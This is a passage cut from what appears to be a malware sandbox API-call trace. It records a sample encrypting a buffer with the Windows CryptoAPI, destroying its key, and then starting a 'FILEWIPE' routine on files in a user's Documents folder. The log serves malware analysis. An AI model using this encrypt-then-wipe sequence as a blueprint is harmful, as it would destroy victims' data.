Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.738] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.738] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.738] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.739] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.739] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.739] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.739] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.740] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.740] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.740] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.740] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.740] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x16907, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x16910) returned 1 [0035.740] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.741] CharLowerBuffW (in: lpsz="byte[92433]", cchLength=0xb | out: lpsz="byte[92433]") returned 0xb [0035.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.742] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.742] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.742] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a68c0*, pdwDataLen=0x6ae220*=0x16907, dwBufLen=0x16910 | out: pbData=0x8a68c0*, pdwDataLen=0x6ae220*=0x16910) returned 1 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.743] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.743] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.744] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.744] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.744] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.744] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.744] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.744] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.744] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.750] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.750] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.750] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.753] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.754] CryptDestroyKey (hKey=0x7c2280) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.754] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.754] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.754] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.754] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.755] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.755] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.755] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.755] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.755] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.755] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.756] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.756] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.757] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.757] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.757] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0035.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.757] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.757] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.757] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, 